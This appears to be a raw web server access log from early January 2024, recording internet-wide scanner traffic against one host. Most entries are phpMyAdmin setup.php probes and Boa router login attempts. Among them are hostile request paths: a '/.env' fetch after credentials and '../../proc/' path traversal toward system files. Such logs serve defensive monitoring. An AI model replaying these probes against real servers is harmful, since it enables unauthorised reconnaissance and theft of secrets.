http://67.218.15.25:80/dbadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:10:19 -0600] "GET http://67.218.15.25:80/mysql/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:10:20 -0600] "GET http://67.218.15.25:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:10:20 -0600] "GET http://67.218.15.25:80/phpma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:10:22 -0600] "GET http://67.218.15.25:80/sqlweb/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:10:23 -0600] "GET http://67.218.15.25:80/webdb/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:10:23 -0600] "GET http://67.218.15.25:80/websql/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:10:25 -0600] "GET http://67.218.15.25:80/_phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:10:27 -0600] "GET http://67.218.15.25:80/php/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:10:27 -0600] "GET http://67.218.15.25:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:10:28 -0600] "GET http://67.218.15.25:80/db/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:10:29 -0600] "GET http://67.218.15.25:80/sqlmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:10:30 -0600] "GET http://67.218.15.25:80/mysqlmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:10:31 -0600] "GET http://67.218.15.25:80/phpmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:10:33 -0600] "GET http://67.218.15.25:80/php-myadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:10:35 -0600] "GET http://67.218.15.25:80/phpmy-admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 43.142.81.31 - - [02/Jan/2024:07:10:35 -0600] "GET http://67.218.15.25:80/mysql-admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-"

185.224.128.191 - - [02/Jan/2024:07:43:13 -0600] "GET / HTTP/1.1" 200 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"

117.235.88.51 - - [02/Jan/2024:07:57:11 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"

89.40.159.111 - - [02/Jan/2024:08:25:30 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"

205.210.31.48 - - [02/Jan/2024:09:27:29 -0600] "GET / HTTP/1.1" 200 241 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

20.150.201.61 - - [02/Jan/2024:09:36:52 -0600] "GET /_profiler/phpinfo HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"

45.79.181.179 - - [02/Jan/2024:09:39:35 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"

167.71.229.198 - - [02/Jan/2024:09:52:44 -0600] "GET /Temporary_Listen_Addresses HTTP/1.1" 404 435 "-" "Mozilla/5.0 zgrab/0.x" 167.71.229.198 - - [02/Jan/2024:09:52:45 -0600] "GET /Pages/log/ HTTP/1.1" 404 435 "-" "Mozilla/5.0 zgrab/0.x"

103.156.56.66 - - [02/Jan/2024:10:34:56 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"

45.95.147.251 - - [02/Jan/2024:10:55:48 -0600] "POST /boaform/admin/formLogin HTTP/1.1" 404 491 "http://67.218.15.25:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"

8.140.201.183 - - [02/Jan/2024:11:27:04 -0600] "GET http://67.218.15.25:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:04 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:04 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:05 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:06 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:06 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:07 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:08 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:10 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:11 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:14 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:15 -0600] "GET http://67.218.15.25:80/pma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:16 -0600] "GET http://67.218.15.25:80/phpMyAdmin3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:16 -0600] "GET http://67.218.15.25:80/myadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:16 -0600] "GET http://67.218.15.25:80/MyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:17 -0600] "GET http://67.218.15.25:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:17 -0600] "GET http://67.218.15.25:80/mysqladmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:19 -0600] "GET http://67.218.15.25:80/SQL/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:20 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:21 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:22 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:22 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:25 -0600] "GET http://67.218.15.25:80/admin/pma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:29 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:30 -0600] "GET http://67.218.15.25:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:31 -0600] "GET http://67.218.15.25:80/webadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:32 -0600] "GET http://67.218.15.25:80/admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:37 -0600] "GET http://67.218.15.25:80/dbadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:38 -0600] "GET http://67.218.15.25:80/mysql/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:38 -0600] "GET http://67.218.15.25:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:39 -0600] "GET http://67.218.15.25:80/phpma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:39 -0600] "GET http://67.218.15.25:80/sqlweb/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:40 -0600] "GET http://67.218.15.25:80/webdb/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:40 -0600] "GET http://67.218.15.25:80/websql/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:41 -0600] "GET http://67.218.15.25:80/_phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:42 -0600] "GET http://67.218.15.25:80/php/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:43 -0600] "GET http://67.218.15.25:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:44 -0600] "GET http://67.218.15.25:80/db/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:45 -0600] "GET http://67.218.15.25:80/sqlmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:45 -0600] "GET http://67.218.15.25:80/mysqlmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:46 -0600] "GET http://67.218.15.25:80/phpmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:47 -0600] "GET http://67.218.15.25:80/php-myadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:48 -0600] "GET http://67.218.15.25:80/phpmy-admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 8.140.201.183 - - [02/Jan/2024:11:27:48 -0600] "GET http://67.218.15.25:80/mysql-admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-"

61.219.11.155 - - [02/Jan/2024:11:28:39 -0600] "\xb9\xa1Iam\x1b\xd03j/{\xed=4O\xed\x8b6x\xee[\xa7o\xed?c8\xcb\x8b\x04J\x88+ \xfa|\xad67k4\v\xeb\xb5oAq;\xf64\xd3\xfd\x954\xf9\xee5I\xf6\xea\xeaF\x0c\xfd\xa9gd\xeaA\xba\xbeM\xf0\ry\xf0j\x80\xabV\xd4\"\xf7\xb8\x84\xf0\x8b\xd2\xd8\x89\xe6xW\xa46\xfc]\xc0KT\xa8\xd8$\x89FOMi\"\xef^\v\x7f\x11\xc0\xd3\x17\x8c\x8f\xab\x05\xe6\x15\xb7\xfb\x85\xb5\xe9\x13\x8b\xb1{\xe0\xcdo;\x90\x16\x1a\xce\n" 400 0 "-" "-"

80.66.88.211 - - [02/Jan/2024:12:01:24 -0600] "\x03" 400 0 "-" "-"

158.247.206.133 - - [02/Jan/2024:13:03:53 -0600] "CONNECT google.com:443 HTTP/1.1" 405 501 "-" "Go-http-client/1.1"

68.183.157.1 - - [02/Jan/2024:13:46:16 -0600] "GET / HTTP/1.0" 200 260 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0" 68.183.157.1 - - [02/Jan/2024:13:52:15 -0600] "GET / HTTP/1.1" 200 297 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0" 68.183.157.1 - - [02/Jan/2024:13:52:15 -0600] "GET /favicon.ico HTTP/1.1" 404 490 "http://67.218.15.25/" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"

167.94.146.56 - - [02/Jan/2024:14:23:57 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 167.94.146.56 - - [02/Jan/2024:14:24:00 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.94.146.56 - - [02/Jan/2024:14:24:00 -0600] "PRI * HTTP/2.0" 400 0 "-" "-" 167.94.146.56 - - [02/Jan/2024:14:24:01 -0600] "GET /favicon.ico HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"

157.211.157.202 - - [02/Jan/2024:14:24:42 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"

62.233.50.179 - - [02/Jan/2024:14:42:02 -0600] "\x03" 400 0 "-" "-"

91.92.243.232 - - [02/Jan/2024:15:04:27 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 91.92.243.232 - - [02/Jan/2024:15:04:43 -0600] "GET ../../proc/ HTTP" 400 0 "-" "-"

192.241.239.4 - - [02/Jan/2024:15:11:36 -0600] "GET /druid/index.html HTTP/1.1" 404 435 "-" "Mozilla/5.0 zgrab/0.x"

179.60.147.13 - - [02/Jan/2024:15:27:16 -0600] "\x03" 400 0 "-" "-"

185.170.144.3 - - [02/Jan/2024:17:31:53 -0600] "\x03" 400 0 "-" "-"

179.60.147.13 - - [02/Jan/2024:18:05:59 -0600] "\x03" 400 0 "-" "-"

104.248.143.84 - - [02/Jan/2024:18:20:10 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"

35.195.93.98 - - [02/Jan/2024:19:02:40 -0600] "GET / HTTP/1.1" 200 297 "-" "python-requests/2.31.0"

162.142.125.215 - - [02/Jan/2024:19:54:46 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 162.142.125.215 - - [02/Jan/2024:19:54:51 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 162.142.125.215 - - [02/Jan/2024:19:54:51 -0600] "PRI * HTTP/2.0" 400 0 "-" "-" 162.142.125.215 - - [02/Jan/2024:19:54:51 -0600] "GET /favicon.ico HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"

198.235.24.213 - - [02/Jan/2024:20:18:52 -0600] "\x16\x03\x01" 400 0 "-" "-" 198.235.24.213 - - [02/Jan/2024:20:18:53 -0600] "\x16\x03\x01" 400 0 "-" "-"

106.13.235.51 - - [02/Jan/2024:20:33:13 -0600] "GET http://67.218.15.25:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:33:15 -0600] "GET http://67.218.15.25:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:33:16 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:33:20 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:33:21 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:33:23 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:33:23 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:33:23 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:33:24 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:33:29 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:33:30 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:33:30 -0600] "GET http://67.218.15.25:80/pma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:33:31 -0600] "GET http://67.218.15.25:80/phpMyAdmin3/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:33:31 -0600] "GET http://67.218.15.25:80/myadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:33:34 -0600] "GET http://67.218.15.25:80/MyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:33:36 -0600] "GET http://67.218.15.25:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:33:40 -0600] "GET http://67.218.15.25:80/mysqladmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:33:40 -0600] "GET http://67.218.15.25:80/SQL/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:33:42 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:33:42 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:33:46 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:33:47 -0600] "GET http://67.218.15.25:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:33:47 -0600] "GET http://67.218.15.25:80/admin/pma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:33:55 -0600] "GET http://67.218.15.25:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:33:58 -0600] "GET http://67.218.15.25:80/webadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:33:58 -0600] "GET http://67.218.15.25:80/admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:33:59 -0600] "GET http://67.218.15.25:80/dbadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:33:59 -0600] "GET http://67.218.15.25:80/mysql/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:34:01 -0600] "GET http://67.218.15.25:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:34:01 -0600] "GET http://67.218.15.25:80/phpma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:34:02 -0600] "GET http://67.218.15.25:80/sqlweb/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:34:02 -0600] "GET http://67.218.15.25:80/webdb/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:34:03 -0600] "GET http://67.218.15.25:80/websql/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:34:05 -0600] "GET http://67.218.15.25:80/_phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:34:05 -0600] "GET http://67.218.15.25:80/php/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:34:09 -0600] "GET http://67.218.15.25:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:34:12 -0600] "GET http://67.218.15.25:80/db/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:34:13 -0600] "GET http://67.218.15.25:80/sqlmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:34:16 -0600] "GET http://67.218.15.25:80/mysqlmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:34:19 -0600] "GET http://67.218.15.25:80/phpmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:34:20 -0600] "GET http://67.218.15.25:80/php-myadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:34:23 -0600] "GET http://67.218.15.25:80/phpmy-admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 106.13.235.51 - - [02/Jan/2024:20:34:27 -0600] "GET http://67.218.15.25:80/mysql-admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-"

45.79.163.53 - - [02/Jan/2024:20:38:25 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 zgrab/0.x"

172.104.11.34 - - [02/Jan/2024:20:39:05 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"

185.161.248.148 - - [02/Jan/2024:20:57:03 -0600] "\x03" 400 0 "-" "-"

45.95.147.251 - - [02/Jan/2024:20:58:20 -0600] "POST /boaform/admin/formLogin HTTP/1.1" 404 491 "http://67.218.15.25:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"

91.92.243.232 - - [02/Jan/2024:21:37:13 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 91.92.243.232 - - [02/Jan/2024:21:37:19 -0600] "GET ../../proc/ HTTP" 400 0 "-" "-"

198.199.117.121 - - [02/Jan/2024:22:12:50 -0600] "GET /ReportServer HTTP/1.1" 404 435 "-" "Mozilla/5.0 zgrab/0.x"

167.94.138.33 - - [02/Jan/2024:22:31:59 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 167.94.138.33 - - [02/Jan/2024:22:32:02 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.94.138.33 - - [02/Jan/2024:22:32:02 -0600] "PRI * HTTP/2.0" 400 0 "-" "-" 167.94.138.33 - - [02/Jan/2024:22:32:02 -0600] "GET /favicon.ico HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"

45.142.182.92 - - [02/Jan/2024:22:35:45 -0600] "CONNECT res.wx.qq.com:443 HTTP/1.1" 405 504 "-" "Go-http-client/1.1"

65.49.20.66 - - [02/Jan/2024:22:39:38 -0600] "\x16\x03\x01" 400 0 "-" "-"

185.189.182.234 - - [02/Jan/2024:23:17:12 -0600] "GET / HTTP/1.1" 400 0 "-" "-"

83.97.73.245 - - [02/Jan/2024:23:32:31 -0600] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

198.235.24.55 - - [02/Jan/2024:23:43:01 -0600] "GET / HTTP/1.0" 200 260 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

62.233.50.179 - - [02/Jan/2024:23:47:00 -0600] "\x03" 400 0 "-" "-"

78.153.140.221 - - [02/Jan/2024:23:54:15 -0600] "GET /.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"

78.153.140.221 - - [02/Jan/2024:23:54:16 -0600] "\x16\x03\x01\x01H\x01" 400 0 "-" "-"

91.92.243.232 - - [02/Jan/2024:23:56:21 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 91.92.243.232 - - [02/Jan/2024:23:56:25 -0600] "GET ../../proc/ HTTP" 400 0 "-" "-"

January 3, 2024

220.173.208.191 - - [03/Jan/2024:00:23:32 -0600] "GET / HTTP/1.0" 200 260 "-" "-"

59.173.181.33 - - [03/Jan/2024:00:24:27 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"

140.224.64.227 - - [03/Jan/2024:00:24:28 -0600] "GET /favicon.ico HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"

64.62.197.97 - - [03/Jan/2024:00:41:43 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.46" 64.62.197.106 - - [03/Jan/2024:00:43:43 -0600] "GET /favicon.ico HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 64.62.197.106 - - [03/Jan/2024:00:44:26 -0600] "GET /geoserver/web/ HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.46"

162.216.150.14 - - [03/Jan/2024:00:57:24 -0600] "GET / HTTP/1.1" 200 241 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

193.106.29.124 - - [03/Jan/2024:01:08:22 -0600] "GET / HTTP/1.0" 200 260 "-" "Mozilla/5.0"

45.33.80.243 - - [03/Jan/2024:01:14:44 -0600] "\x16\x03\x01" 400 0 "-" "-"

185.142.236.41 - - [03/Jan/2024:01:16:40 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"

